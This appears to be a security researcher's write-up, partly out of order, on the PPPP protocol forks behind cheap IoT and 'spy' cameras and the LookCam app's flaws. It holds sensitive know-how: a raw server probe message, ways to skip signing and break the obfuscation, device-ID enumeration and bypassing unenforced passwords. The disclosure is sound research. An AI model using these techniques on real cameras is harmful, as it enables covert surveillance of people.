I’ve removed the encryption key from the init string because this fork doesn’t seem to support any kind of encryption on the protocol level. On the application level AES encryption is being applied to audio and video streams, all the auxiliary communication is completely unencrypted however.
Paul Marrapese’s Wireshark Dissector appears to be woefully outdated with regards to the Yi Technology fork, the differences introduced here are actually quite extensive. The MSG_NOTICE_TO_EX message is particularly worth noting, it allows sending a JSON payload to the device that will trigger various commands. Judging by its “fancy” authentication mechanism this message is meant to be sent by Yi servers only. Before you get too excited: Yi firmware doesn’t seem to actually parse the JSON payload, it merely extracts the command value via substring matching and ignores the rest.
This fork also introduced a V2 message header variant that starts with F2 magic byte instead of F1. While the only message actually sent with this message header seems to be MSG_DEV_WAKEUP_REQ, the device will allow any message to start with it. The V2 message header adds 24 bytes to the original 4 byte message header, the message header is then:
F2)Unless I am totally mistaken, the HMAC-SHA1 key used to sign this header is tnp_license which is a six letter string calculated by APILicenseCalculate function in the CS2 implementation. While the Yi implementation of the library no longer seems to expose this functionality, I have to assume that the same algorithm is being used here, merely with a different table which should be possible to recover from a few known license values. Not that it really matters: at least the firmware I saw simply ignored all the “new” stuff in the header.
Note: the same signing approach (and usually the same signing key) seems to be used for various messages such as MSG_PUNCH_TO_EX. While the signature is being verified here, it’s still possible to send the “old and busted” MSG_PUNCH_TO message (same message type, smaller payload size) instead and skip the signing. The approach used to sign MSG_NOTICE_TO_EX message is different, and this code seems to use a key which can actually be considered a secret.
Altogether, the messages differing from the CS2 implementation seem to be:
| Message | Message type | Payload size |
|---|---|---|
| MSG_HELLO | 00 | 0 or 24 |
| MSG_P2P_SERVER_REQ | 04 | 88 |
| MSG_SESSION_RESPONSE | 06 | 4 |
| MSG_DEV_LGN_PROXY | 10 | 128 + n n is uint8 at offset 124 |
| MSG_DEV_LGN_PROXY_ACK | 11 | 20 |
| MSG_DEV_LGN_SIGN | 14 | 104 |
| MSG_DEV_LGN_SIGN_ACK | 15 | 4 |
| MSG_DEV_ONLINE_REQ | 18 | 20 |
| MSG_DEV_ONLINE_REQ_ACK | 19 | 8 |
| MSG_DEV_WAKEUP_REQ | 1A | 20 |
| MSG_P2P_TCP_SERVER | 22 | 16 |
| MSG_LAN_SEARCH | 30 | 24 |
| MSG_LAN_NOTIFY | 31 | 20 |
| MSG_LAN_NOTIFY_ACK | 32 | 20 |
| MSG_NOTICE_PING | 3A | 20 |
| MSG_NOTICE_PING_ACK | 3B | 24 |
| MSG_NOTICE_TO_EX | 3F | 96 + n n is size of JSON payload (uint32 at offset 92) |
| MSG_NOTICE_TO_ACK | 3F | 96 + n n is size of numeric response (uint16 at offset 92) |
| MSG_PUNCH_TO_EX | 40 | 44 |
| MSG_PUNCH_PKT_EX | 41 | 44 |
| MSG_P2P_RDY_EX | 42 | 40 |
| MSG_P2P_RDY_ACK | 43 | 0 |
| MSG_R2PMP_REQ | 50 | 56 |
| MSG_R2PMP_START | 51 | 40 |
| MSG_R2PMP_PKT | 52 | 40 |
| MSG_R2PMP_RDY | 53 | 40 |
| MSG_RLY_PORT_EX | 74 | 84 |
| MSG_RLY_PORT_ACK | 75 | 8 |
| MSG_RLY_HELLO_SDEV | 76 | 0 |
| MSG_RLY_HELLO_SDEV_ACK | 77 | 0 |
| MSG_RLY_TO_ACK | 85 | 28 |
| MSG_RLY_SERVER_REQ | 87 | 20 |
| MSG_RLY_SERVER_REQ_ACK | 87 | 20 |
| MSG_RLY_TCP_START | 88 | 84 |
| MSG_RLY_TCP_START_ACK | 88 | 20 |
| MSG_RLY_TCP_REQ | 89 | 52 |
| MSG_RLY_TCP_REQ_ACK | 89 | 4 |
| MSG_RLY_TCP_TO | 8A | 32 |
| MSG_RLY_TCP_TO_ACK | 8A | 40 |
| MSG_RLY_TCP_PKT | 8B | 20 |
| MSG_RLY_TCP_RESULT | 8B | 4 |
| MSG_RLY_EASYTCP_START | 8C | 88 |
| MSG_SDEV_SESSIONREPORT | 93 | 68 |
| MSG_SDEV_SESSIONREPORT_ACK | 93 | 4 |
| MSG_SDEV_REPORT | 94 | 116 |
| MSG_CONNECT_REPORT | A0 | 40 |
| MSG_REPORT_REQ | A1 | 4 |
| MSG_REPORT | A2 | 100 |
| MSG_SENDDATA_REPORT | A4 | 28 |
| MSG_SENDDATA_REPORT_ACK | A4 | 4 |
| MSG_PROBE_START | AA | 20 or 1220 |
| MSG_PROBE_ACK | AB | 24 + n · 16 n is probe count (uint32 at offset 20) |
| MSG_PROBE_ACK2 | AC | 20 |
| MSG_SERVER_CONFIG_REQ | B0 | 40 |
| MSG_DRW_ACK | D2 | 4 |
| MSG_ALIVE | E0 | 0 or 4 |
| MSG_ALIVE_ACK | E1 | 0 or 4 |
| MSG_BITRATE_INFO | E5 | 8 |
The protocol fork by Shenzhen Yunni Technology iLnkP2P seems to have been developed from scratch. The device IDs for legacy iLnk networks are easy to recognize because their verification codes only consist of the letters A to F. The algorithm generating these verification codes is public knowledge (CVE-2019-11219) so we know that these are letters taken from an MD5 hex digest. New iLnk networks appear to have verification codes that can contain all Latin letters, some new algorithm replaced the compromised one here. Maybe they use Base64 digests now?
An iLnk init string can be recognized by the presence of a dash:
ATBBARASAXAOAQAOAQAOARBBARAZASAOARAWAYAOARAOARBBARAQAOAQAOAQAOAR-$$
The part before the dash decodes into:
3;127.0.0.1;192.168.1.1;10.0.0.1
Yes, the first list entry has to specify how many server IPs there are. The decoding approach (function HI_DecStr or XqStrDec depending on the implementation) is much simpler here, it’s a kind of Base26 encoding. The part after the dash can encode additional parameters related to validation of device IDs but typically it will be $$ indicating that it is omitted and network-specific device ID validation can be skipped. As far as I can tell, iLnk networks will always send all data as plain text, there is no encryption functionality of any kind.
Going through the code, the network-level changes in the iLnk fork are extensive, with only the most basic messages shared with the original PPPP protocol. Some message types are clashing like for example MSG_DEV_MAX that uses the same type as MSG_DEV_LGN_CRC in the CS2 implementation. This fork also introduces new magic numbers: while PPPP messages normally start with 0xF1, some messages here start with 0xA1 and one for some reason with 0xF2. In the table below I list the magic number as part of the message type.
Unfortunately, I haven’t seen any comprehensive analysis of this protocol variant yet, so I’ll just list the message types along with their payload sizes. For messages with 20 bytes payloads it can be assumed that the payload is a device ID. Don’t ask me why two pairs of messages share the same message type.
| Message | Message type | Payload size |
|---|---|---|
| MSG_HELLO | F1 00 | 0 |
| MSG_HELLO_ACK | F1 01 | IPv4: 16 IPv6: 128 |
| MSG_RLY_TO | F1 02 | 32 |
| MSG_RLY_PKT | F1 03 | 0 |
| MSG_DEV_LGN | F1 10 | IPv4: 40 IPv6: 152 |
| MSG_DEV_LGN_ACK | F1 11 | 4 |
| MSG_DEV_MAX | F1 12 | 20 |
| MSG_P2P_REQ | F1 20 | IPv4: 36 IPv6: 152 |
| MSG_P2P_REQ_ACK | F1 21 | 4 |
| MSG_LAN_SEARCH | F1 30 | 0 |
| MSG_LAN_SEARCH_EXT | F1 32 | 0 |
| MSG_LAN_SEARCH_EXT_ACK | F1 33 | 52 |
| MSG_DEV_UNREACH | F1 35 | 20 |
| MSG_PUNCH_PKT | F1 41 | 20 |
| MSG_P2P_RDY | F1 42 | 20 |
| MSG_RS_LGN | F1 60 | 28 |
| MSG_RS_LGN_EX | F1 62 | 44 |
| MSG_LST_REQ | F1 67 | 20 |
| MSG_LST_REQ_ACK | F1 69 | 4 + n · 16 n is relay address count (int32 at offset 0) |
| MSG_RLY_HELLO | F1 70 | 0 |
| MSG_RLY_HELLO_ACK | F1 71 | 0 |
| MSG_RLY_PORT | F1 72 | 0 |
| MSG_RLY_PORT_ACK | F1 73 | 8 |
| MSG_RLY_PORTEX_ACK | F1 76 | 264 |
| MSG_RLY_REQ_EX | F1 77 | 288 |
| MSG_RLY_REQ | F1 80 | IPv4: 40 IPv6: 160 |
| MSG_RLY_REQ_ACK | F1 81 | 4 |
| MSG_HELLO_TO | F1 82 | 20 |
| MSG_HELLO_TO_ACK | F1 83 | 28 |
| MSG_RLY_RDY | F1 84 | 20 |
| MSG_SDEV_RUN | F1 90 | 0 |
| MSG_SDEV_LGN | F1 91 | 20 |
| MSG_SDEV_LGN_ACK | F1 91 | IPv4: 16 IPv6: 128 |
| MSG_MGM_ADMIN | F1 A0 | 160 |
| MSG_MGM_DEVLIST_CTRL | F1 A2 | 20 |
| MSG_MGM_HELLO | F1 A4 | 4 |
| MSG_MGM_MULTI_DEV_CTRL | F1 A6 | 24 + n · 4 n is uint32 at offset 20 |
| MSG_MGM_DEV_DETAIL | F1 A8 | 24 |
| MSG_MGM_DEV_VIEW | F1 AA | 4 |
| MSG_MGM_RLY_LIST | F1 AC | 12 |
| MSG_MGM_DEV_CTRL | F1 AE | 24 |
| MSG_MGM_MEM_DB | F1 B0 | 264 |
| MSG_MGM_RLY_DETAIL | F1 B2 | 24 |
| MSG_MGM_ADMIN_LGOUT | F1 BA | 4 |
| MSG_MGM_ADMIN_CHG | F1 BC | 164 |
| MSG_VGW_LGN | F1 C0 | 24 |
| MSG_VGW_LGN_EX | F1 C0 | 24 |
| MSG_VGW_REQ | F1 C3 | 20 |
| MSG_VGW_REQ_ACK | F1 C4 | 4 |
| MSG_VGW_HELLO | F1 C5 | 0 |
| MSG_VGW_LST_REQ | F1 C6 | 20 |
| MSG_VGW_LST_ACK | F1 C7 | 8 + n · 128 n is target address count (int32 at offset 0) |
| MSG_DRW | F1 D0 | 4 + n n is implied payload size |
| MSG_DRW_ACK | F1 D1 | 4 + n · 2 n is sequence ID count (uint16 at offset 2) |
| MSG_P2P_ALIVE | F1 E0 | 0 |
| MSG_P2P_ALIVE_ACK | F1 E1 | 0 |
| MSG_CLOSE | F1 F0 | 0 |
| MSG_MGM_DEV_LGN_DETAIL_DUMP | F1 F4 | 12 |
| MSG_MGM_DEV_LGN_DUMP | F1 F4 | 12 |
| MSG_MGM_LOG_CTRL | F1 F7 | 12 |
| MSG_SVR_REQ | F2 10 | 0 |
| MSG_SVR_REQ_ACK | F2 11 | variable (NUL-terminated) |
| MSG_DEV_LV_HB | A1 00 | 20 |
| MSG_DEV_SLP_HB | A1 01 | 20 |
| MSG_DEV_QUERY | A1 02 | 20 |
| MSG_DEV_WK_UP_REQ | A1 04 | 20 |
| MSG_DEV_WK_UP | A1 06 | 20 |
While I’ve seen a few of apps with HLP2P code and the corresponding init strings, I am not sure whether these are still used or merely leftovers from some past adventure. All these apps use primarily networks that rely on other protocol implementations.
HLP2P init strings contain a dash which follows merely three letters. These three letters are ignored and I am unsure about their significance as I’ve only seen one variant:
DAS-0123456789ABCDEF
The decoding function is called from HLP2P_Initialize function and uses the most elaborate approach of all. The hex-encoded part after the dash is decrypted using AES-CBC where the key and initialization vector are derived from a zero-filled buffer via some bogus MD5 hashing. The decoded result is a list of comma-separated parameters like:
DCDC07FF,das,10000001,a+a+a,127.0.0.1-192.168.1.1-10.0.0.1,ABC-CBA
The fifth parameter is a list of server IP addresses and the sixth appears to be the list of supported device prefixes.
On the network level HLP2P is an oddity here. Despite trying hard to provide the same API as other PPPP implementations, including concepts like init strings and device IDs, it appears to be a TCP-based protocol (connecting to server’s port 65527) with little resemblance to PPPP. UDP appears to be used for local broadcasts only (on port 65531). I didn’t spend too much time on the analysis however.
The CS2 implementation of the protocol is the only one that bothers with encrypting data, though their approach is better described as obfuscation. When encryption is enabled, the function P2P_Proprietary_Encrypt is applied to all outgoing and the function P2P_Proprietary_Decrypt to all incoming messages. These functions take the encryption key (which is typically visible in the application code as an unobfuscated part of the init string, resulting in common keys being documented online) and mash it into four bytes. These four bytes are then used to select values from a static table that the bytes of the message should be XOR’ed with. A number of public reimplementations for this “encryption” exist, e.g. this one.
While an effective four byte encryption key is already bad enough, the cryptography here is actually even worse. I’ve published an analysis of this encryption algorithm which comes to the conclusion that there are at most 540,672 effective keys and still considerably fewer possible ciphertexts. These flaws allow communication even without the knowledge of the encryption key: sending all possible ciphertexts of the request and in most cases recovering the effective encryption key from a single response.
The same obfuscation is used unconditionally for TCP traffic in the CS2 implementation which uses TCP port 443 as fallback. Here each message header contains two random bytes. The hex representation of these bytes is used as key to obfuscate message contents.
All *_CRC messages like MSG_DEV_LGN_CRC have an additional layer of obfuscation, performed by the functions PPPP_CRCEnc and PPPP_CRCDec. Unlike P2P_Proprietary_Encrypt which is applied to the entire message including the header, PPPP_CRCEnc is only applied to the payload. As normally only messages exchanged between the device and the server are obfuscated in this way, the corresponding key tends to be contained only in the device firmware and not in the application. Here as well the key is mashed into four bytes which are then used to generate a byte sequence that the message (extended by four + signs) is XOR’ed with. This is effectively an XOR cipher with a static key which is easy to crack even without knowing the key.
The CS2 implementation of the protocol contains a curiosity: two messages starting with 338DB900E559 being processed in a special way. No, this isn’t a hexadecimal representation of the bytes – it’s literally the message contents. No magic bytes, no encryption, the messages are expected to be 17 bytes long and are treated as zero-terminated strings.
I tried sending 338DB900E5592B32 (with a trailing zero byte) to a PPPP server and, surprisingly, received a response (non-ASCII bytes are represented as escape sequences):
\x0e\x0ay\x07\x08uT_ChArLiE@Cs2-NeTwOrK.CoM!
This response was consistent for this server, but another server of the same network responded slightly differently:
\x0e\x0ay\x07\x08vT_ChArLiE@Cs2-NeTwOrK.CoM!
A server from a different network which normally encrypts all communication also responded:
\x17\x06f\x12fDT_ChArLiE@Cs2-NeTwOrK.CoM!
It doesn’t take a lot of cryptanalysis knowledge to realize that an XOR cipher with a constant key is being applied here. Thanks to my “razor sharp deduction” I could conclude that the servers are replying with their respective names and these names are being XOR’ed with the string CS2MWDT_ChArLiE@Cs2-NeTwOrK.CoM!. Yes, likely the very same Charlie already mentioned at the start of this article. Hi, Charlie!
I didn’t risk sending the other message, not wanting to shut down a server accidentally. But maybe Shodan wants to extend their method of detecting PPPP servers: their current approach only works when no encryption is used, yet this message seems to get replies from all CS2 servers regardless of encryption.
Once a connection between the client and the device is established, MSG_DRW messages are exchanged in both directions. The messages will be delivered in order and retransmitted if lost, giving application developers something resembling a TCP stream if you don’t look too closely. In addition, each message is tagged with a channel ID, a number between 0 and 7. It looks like channel IDs are universally ignored by devices and are only relevant in the other direction. The idea seems to be that a client receiving a video stream should still be able to send commands to the device and receive responses over the same connection.
The PPPP protocol doesn’t make any recommendations about how applications should encode their data within that stream, and so they developed a number of wildly different application-level protocols. As a rule of thumb, all devices and clients on a particular PPPP network will always speak the same application-level protocol, though there might be slight differences in the supported capabilities. Different networks can share the same protocol, allowing them to be supported within the same application. Usually, there will be multiple applications implementing the same application-level protocol and working with the same PPPP networks, but I haven’t yet seen any applications supporting different protocols.
This allows grouping the applications by their application-level protocol. Applications within the same group are largely interchangeable, same devices can be accessed from any application. This doesn’t necessarily mean that everything will work correctly, as there might still be subtle differences. E.g. an application meant for visual doorbells probably accesses somewhat different functionality than one meant for security cameras even if both share the same protocol. Also, devices might be tied to the cloud infrastructure of a specific application, rendering them inaccessible to other applications working with the same PPPP network.
Fun fact: it is often very hard to know up front which protocol your device will speak. There is a huge thread with many spin-offs where people are attempting to reverse engineer A9 Mini cameras so that these can be accessed without an app. This effort is being massively complicated by the fact that all these cameras look basically the same, yet depending on the camera one out of at least four extremely different protocols could be used: HDWifiCamPro variant of SHIX JSON, YsxLite variant of iLnk binary, JXLCAM variant of CGI calls, or some protocol I don’t know because it isn’t based on PPPP.
The following is a list of PPPP-based applications I’ve identified so far, at least the ones with noteworthy user numbers. Mind you, these numbers aren’t necessarily indicative of the number of PPPP devices – some applications listed only use PPPP for some devices, likely using other protocols for most of their supported devices (particularly the ones that aren’t cameras). I try to provide a brief overview of the application-level protocol in the footnotes. Disclaimer: These applications tend to support a huge number of device prefixes in theory, so I mostly chose the “typical” ones based on which ones appear in YouTube videos or GitHub discussions.
| Application | Typical device prefixes | Application-level protocol |
|---|---|---|
| Xiaomi Home | XMSYSGB | JSON (MISS) 1 |
| Kami Home Yi Home Yi iot |
TNPCHNA TNPCHNB TNPUSAC TNPUSAM TNPXGAC | binary 2 |
| Geeni littlelf smart Owltron SmartLife - Smart Living Tuya - Smart Life,Smart Living |
TUYASA | binary (Thing SDK / Tuya SDK) 3 |
| 365Cam CY365 Goodcam HDWifiCamPro PIX-LINK CAM VI365 X-IOT CAM |
DBG DGB DGO DGOA DGOC DGOE NMSA PIXA PIZ | JSON (SHIX) 4 |
| eufy-original eufy Security eufy Clean(EufyHome) |
HXEUCAM HXUSCAM SECCAMA EUPRDMB | binary 5 |
| eWeLink - Smart Home | EWLK | binary (iCareP2P) 6 |
| Eye4 O-KAM Pro Veesky |
EEEE VSTA VSTB VSTC VSTD VSTF VSTJ | CGI calls 7 |
| CamHi CamHipro |
AAFF EEEE MMMM NNNN PPPP SSAA SSAH SSAK SSAT SSSS TTTT | binary 8 |
| Arenti CloudEdge ieGeek Cam ZUMIMALL |
ECIPCM | binary (Meari SDK) 9 |
| YsxLite | BATC BATE PTZ PTZA PTZB TBAT | binary (iLnk) 10 |
| FtyCamPro | FTY FTYA FTYC FTZ FTZW | binary (iLnk) 11 |
| JXLCAM | ACCQ BCCA BCCQ CAMA | CGI calls 12 |
| LookCam | BHCC FHBB GHBB | JSON 13 |
| HomeEye LookCamPro StarEye |
AYS AYSA TUT | JSON (SHIX) 14 |
| minicam | CAM888 | CGI calls 15 |
| Aqara Home | unknown | JSON 16 |
| App2Cam Plus OMGuard HD |
CGAG CGYU CHXX CMAG CTAI WGAG | binary (Jsw SDK) 17 |
| LOCKLY® | LOCKLYV | binary (iCareP2P) 18 |
| InstarVision | INSTAR VIEW | CGI calls 19 |
Each message starts with a 4 byte command ID. The initial authorization messages (command ID 0x100 and 0x101) contain plain JSON data. Other messages contain ChaCha20-encoded data: first 8 bytes nonce, then the ciphertext. The encryption key is negotiated in the authorization phase. The decrypted plaintext again starts with a 4 byte command ID, followed by JSON data. There is even some Chinese documentation of this interface though it is rather underwhelming. ↩︎
The device-side implementation of the protocol is available on the web. This doesn’t appear to be reverse engineered, it’s rather the source code of the real thing complete with Chinese comments. No idea who or why published this, I found it linked by the people who develop own changes to the stock camera firmware. The extensive tnp_eventlist_msg_s structure being sent and received here supports a large number of commands. ↩︎
Each message is preceded by a 16 byte header: 78 56 34 12 magic bytes, request ID, command ID, payload size. This is a very basic interface exposing merely 10 commands, most of which are requesting device information while the rest control video/audio playback. As Tuya SDK also communicates with devices by means other than PPPP, more advanced functionality is probably exposed elsewhere. ↩︎
Messages are preceded by an 8 byte binary header: 06 0A A0 80 magic bytes, four bytes payload size (there is a JavaScript-based implementation). The SHIX JSON format is a translation of this web API interface: /check_user.cgi?user=admin&pwd=pass becomes {"pro": "check_user", "cmd": 100, "user": "admin", "pwd": "pass"}. The pro and cmd fields are redundant, representing a command both as a string and as a number. A very basic implementation of this protocol is available here. ↩︎
This is the only PPPP network I saw making use of the protocol’s DSK feature: connecting to a device requires knowing a DSK key that is issued by the server. It would be interesting to see whether this really produces a significant hurdle towards unauthorized device access. There is a complete open source implementation of the communication protocol, both PPPP and application-level parts. Each message starts with a 16 byte header: 58 5A 59 48 magic bytes, two bytes command ID, two bytes payload size, 00 00 01 00 bytes, channel identifier byte, encryption type byte and two zero bytes. This is followed up by an optional and potentially AES-encrypted payload. Payload can be JSON data but for most commands simpler data representations are being used. Due to the way the AES key is derived, the payload encryption mechanism has been deemed to offer little protection. Interestingly, it appears that the device has no own authentication mechanism and relies solely on DSK protection. ↩︎
Each message is preceded by a 24 byte header starting with the magic bytes 88 88 76 76, payload size and command ID. The other 12 bytes of the header are unused. More than 60 command IDs are supported, each with its own binary payload format. Some very basic commands have been documented in a HomeAssistant component. ↩︎
The binary message headers are similar to the ones used by apps like 365Cam: 01 0A 00 00 magic bytes, four bytes payload size. The payload is however a web request loosely based on this web API interface: GET /check_user.cgi?loginuse=admin&loginpas=pass&user=admin&pwd=pass. Yes, user name and password are duplicated, probably because not all devices expect loginuse/loginpas parameters? There is an outdated implementation of this protocol, lacking support for PPPP encryption or dual authentication. ↩︎
The 24 byte header preceding messages is similar to eWeLink: magic bytes 99 99 99 99, payload size and command ID. The other 12 bytes of the header are unused. Not trusting PPPP, CamHi encrypts the payload using AES. It looks like the encryption key is an MD5 hash of a string containing the user name and password among other things. Somebody published some initial insights into the application code. ↩︎
Each message is preceded by a 52 byte header starting with the magic bytes 56 56 50 99. Bulk of this header is taken up by an authentication token: a SHA1 hex digest hashing the username (always admin), device password, sequence number, command ID and payload size. The implemented interface provides merely 14 very basic commands, essentially only exposing access to recordings and the live stream. So the payload even where present is something trivial like a date. As Meari SDK also communicates with devices by means other than PPPP, more advanced functionality is probably exposed elsewhere. ↩︎
The commands and their binary representation are contained within libvdp.so which is the iLnk implementation of the PPPP protocol. Each message is preceded by a 12 bytes header starting with the 11 0A magic bytes. The commands are two bytes long with the higher byte indicating the command type: 2 for SD card command, 3 for A/V command, 4 for file command, 5 for password command, 6 for network command, 7 for system command. ↩︎
While FtyCamPro app handles different networks than YsxLite, it relies on the same libvdp.so library, meaning that the application-level protocol should be the same. It’s possible that some commands are interpreted differently however. ↩︎
The protocol is very similar to the one used by VStarcam apps like O-KAM Pro. The payload has only one set of credentials however, the parameters user and pwd. It’s also a far more limited and sometimes different set of commands. ↩︎
Each message is wrapped in binary data: a prefix starting with A0 AF AF AF before it, the bytes F4 F3 F2 F1 after. For some reason the prefix length seems to be different depending on whether the message is sent to the device (26 bytes) or received from it (25 bytes). I don’t know what most of it is yet everything but the payload length at the end of the prefix seems irrelevant. This Warwick University paper has some info on the JSON payload. It’s particularly notable that the password sent along with each command isn’t actually being checked. ↩︎
LookCamPro & Co. share significant amounts of code with the SHIX apps like 365Cam, they implement basically the same application-level protocol. There are differences in the supported commands however. It’s difficult to say how significant these differences are because all apps contain significant amounts of dead code, defining commands that are never used and probably not even supported. ↩︎
The minicam app seems to use almost the same protocol as VStarcam apps like O-KAM Pro. It handles other networks however. Also, a few of the commands seem different from the ones used by O-KAM Pro, though it is hard to tell how significant these incompatibilities really are. ↩︎
The JSON data containing command parameters is preceded by a 16 bytes header containing command ID, payload length and two other values that are ignored other than being quoted verbatim in the response. Commands sent to the device always have even IDs, for the reponse the device increases the command ID by 1. The 14 exposed commands seem to be all dealing with audio/video streams and playback controls. Camera configuration must be done by other means. ↩︎
Each message is preceded by a 4 bytes header: 3 bytes payload size, 1 byte I/O type (1 for AUTH, 2 for VIDEO, 3 for AUDIO, 4 for IOCTRL, 5 for FILE). The payload starts with a type-specific header. If I read the code correctly, the first 16 bytes of the payload are encrypted with AES-ECB (unpadded) while the rest is sent unchanged. There is an “xor byte” in the payload header which is changed with every request seemingly to avoid generating identical ciphertexts. Payloads smaller than 16 bytes are not encrypted. I cannot see any initialization of the encryption key beyond filling it with 32 zero bytes, which would mean that this entire mechanism is merely obfuscation. ↩︎
The overall protocol seems identical to eWeLink. However, the smart locks are only supposed to respond to six commands, and the command IDs are different from the ones eWeLink uses. ↩︎
The protocol is very similar to the one used by VStarcam apps like O-KAM Pro, down to sending two sets of credentials. However, the actual CGI endpoints and their parameters are different. ↩︎
I’ve got my hands on an internet-connected camera and decided to take a closer look, having already read about security issues with similar cameras. What I found far exceeded my expectations: fake access controls, bogus protocol encryption, completely unprotected cloud uploads and firmware riddled with security flaws. One could even say that these cameras are Murphy’s Law turned solid: everything that could be done wrong has been done wrong here. While there is considerable prior research on these and similar cameras that outlines some of the flaws, I felt that the combination of severe flaws is reason enough to publish an article of my own.
My findings should apply to any camera that can be managed via the LookCam app. This includes cameras meant to be used with less popular apps of the same developer: tcam, CloudWayCam, VDP, AIBoxcam, IP System. Note that the LookCamPro app, while visually very similar, is technically quite different. It also uses the PPPP protocol for low-level communication but otherwise doesn’t seem to be related, and the corresponding devices are unlikely to suffer from the same flaws.
There seems to be little chance that things will improve with these cameras. I have no way of contacting either the hardware vendors or the developers behind the LookCam app. In fact, it looks like masking their identity was done on purpose here. But even if I could contact them, the cameras lack an update mechanism for their firmware. So fixing the devices already sold is impossible.
I have no way of knowing how many of these cameras exist. The LookCam app is currently listed with almost 1.5 million downloads on Google Play however. An iPhone and a Windows version of the app are also available but no public statistics exist here.
The camera cannot be easily isolated from unauthorized access. It can either function as a WiFi access point, but setting a WiFi password isn’t possible. Or it can connect to an existing network, and then it will insist on being connected to the internet. If internet access is removed the camera will go into a reboot loop. So you have the choice of letting anybody in the vicinity access this camera or allowing it to be accessed from the internet.
The communication of this camera is largely unencrypted. The underlying PPPP protocol supports “encryption” which is better described as obfuscation, but the LookCam app almost never makes use of it. Not that it would be of much help, the proprietary encryption algorithms being developed without any understanding of cryptography. These rely on static encryption keys which are trivially extracted from the app but should be easy enough to deduce even from merely observing some traffic.
The camera firmware is riddled with buffer overflow issues which should be trivial to turn into arbitrary code execution. Protection mechanisms like DEP or ASLR might have been a hurdle but these are disabled. And while the app allows you to set an access password, the firmware doesn’t really enforce it. So access without knowing the password can be accomplished simply by modifying the app to skip the password checks.
The only thing preventing complete compromise of any camera is the “secret” device ID which has to be known in order to establish a connection. And by “secret” I mean that device IDs can generally be enumerated but they are “secured” with a five letter verification code. Unlike with some similar cameras, the algorithm used to generate the verification code isn’t public knowledge yet. So somebody wishing to compromise as many cameras as possible would need to either guess the algorithm or guess the verification codes by trying out all possible combinations. I suspect that both approaches are viable.
And while the devices themselves have access passwords which a future firmware version could in theory start verifying, the corresponding cloud service has no authentication beyond knowledge of the device ID. So any recordings uploaded to the cloud are accessible even if the device itself isn’t. Even if the camera owner hasn’t paid for the cloud service, anyone could book it for them if they know the device ID. The cloud configuration is managed by the server, so making the camera upload its recordings doesn’t require device access.
Most cameras connecting to the LookCam app are being marketed as “spy cam” or “nanny cam.” These are made to look like radio clocks, USB chargers, bulb sockets, smoke detectors, even wall outlets. Most of the time their pretended functionality really works. In addition they have an almost invisible pinhole camera that can create remarkably good recordings. I’ve seen prices ranging from US$40 to hundreds of dollars.
The marketing spin says that these cameras are meant to detect when your house is being robbed. Or maybe they allow you to observe your baby while it is in the next room. Of course, in reality people are far more inventive in their use of tiny cameras. Students discovered them for cheating in exams. Gamblers use them to get an advantage at card games. And then there is of course the matter of non-consentual video recordings. So next time you stay somewhere where you don’t quite trust the host you might want to search for “LookCam” on YouTube, just to get an idea of how to recognize such devices.
The camera I had was based on the Anyka AK39Ev330 hardware platform, essentially an ARM CPU with an attached pinhole camera. Presumably, other cameras connecting to the LookCam app are similar, even though there are some provisions for hardware differences in the firmware. The device looked very convincing, its main giveaway being unexpected heat development.
All LookCam cameras I’ve seen were strictly noname devices, it is unclear who builds them. Given the variety of competing form factors I suspect that a number of hardware vendors are involved. Maybe there is one vendor producing the raw camera kit and several others who package it within the respective casings.
The LookCam app can manage a number of cameras. Some people demonstrating the app on YouTube had around 50 of them, though I suspect that these are camera sellers and not regular users.
While each camera can be given a custom name, its unique ID is always visible as well. For example, the first camera listed in the screenshot above has the ID GHBB-000001-NRLXW which the apps shortens into G000001NRLXW. Here GHBB is the device prefix: LookCam supports a number of these but only BHCC, FHBB and GHBB seem to exist in reality (abbreviated as B, F and G respectively). 000001 is the device number, each prefix can theoretically support a million devices. The final part is a five-letter verification code: NRLXW. This one has to be known for the device connection to succeed, it makes enumerating device IDs more difficult.
Out of the box, the device is in access point mode: it provides a WiFi access point with the device ID used as wireless network name. You can connect to that access point, and LookCam will be able to find the camera via a network broadcast, allowing you to configure it. You might be inclined to leave the camera in access point mode but it is impossible to set a WiFi password. This means that anybody in the vicinity can connect to this WiFi network and access the camera through it. So there is no way around configuring the camera to connect to your network.
Once the camera is connected to your network the P2P “magic” happens. LookCam app can still find the camera via a network broadcast. But it can also establish a connection when you are not on the same network. In other words: the camera can be accessed from the internet, assuming that someone knows its device ID.
Exposing the camera to internet-based attacks might not be something that you want, with it being in principle perfectly capable of writing its recordings to an SD card. But if you deny it access to the internet (e.g. via a firewall rule) the camera will try to contact its server, fail, panic and reboot. It will keep rebooting until it receives a response from the server.
One thing to note is also: the device ID is displayed in pretty much every screen of this app. So when users share screenshots or videos of the app (which they do often) they will inevitably expose the ID of their camera, allowing anyone in the world to connect to it. I’ve seen very few cases of people censoring the device ID, clearly most of them aren’t aware that it is sensitive information. The LookCam app definitely isn’t communicating that it is.
How can LookCam establish a connection to the camera having only its device ID? The app uses the PPPP protocol developed by the Chinese company CS2 Network. Supposedly, in 2019 CS2 Network had 300 customers with 20 million devices in total. This company supplies its customers with a code library and the corresponding server code which the customers can run as a black box. The idea of the protocol is providing an equivalent of the TCP protocol which implicitly locates a device by its ID and connects to it.
Side note: Whoever designed this protocol didn’t really understand TCP. For example, they tried to replicate the fault tolerance of TCP. But instead of making retransmissions an underlying protocol feature there are dozens of different (not duplicated but really different) retransmission loops throughout the library. Where TCP tries to detect network congestions and back off the PPPP protocol will send even more retransmitted messages, rendering suboptimal connections completely unusable.
Despite being marketed as Peer-to-Peer (P2P) this protocol relies on centralized servers. Each device prefix is associated with a set of three servers, this being the protocol designers’ idea of high-availability infrastructure. Devices regularly send messages to all three servers, making sure that these are aware of the device’s IP address. When the LookCam app (client) wants to connect to a device, it also contacts all three servers to get the device’s IP address.
The P2P part is the fact that device and client try to establish a direct connection instead of relaying all communication via a central server. The complicating factor here are firewalls which usually disallow direct connections. The developers didn’t like established approaches like Universal Plug and Play (UPnP), probably because these are often disabled for security reasons. So they used a trick called UDP hole punching. This involves guessing which port the firewall assigned to outgoing UDP traffic and then communicating with that port, so that the firewall considers incoming packets a response to previously sent UDP packets and allows them through.
Does that always work? That’s doubtful. So the PPPP protocol allows for relay servers to be used as fallback, forwarding traffic from and to the device. But this direct communication presumably succeeds often enough to keep the traffic on PPPP servers low, saving costs.
The FHBB and GHBB device prefixes are handled by the same set of servers, named the “mykj” network in the LookCam app internally. Same string appears in the name of the main class as well, indicating that it likely refers to the company developing the app. This seems to be a short form of “Meiyuan Keji,” a company name that translates as “Dollar Technology.” I couldn’t find any further information on this company however.
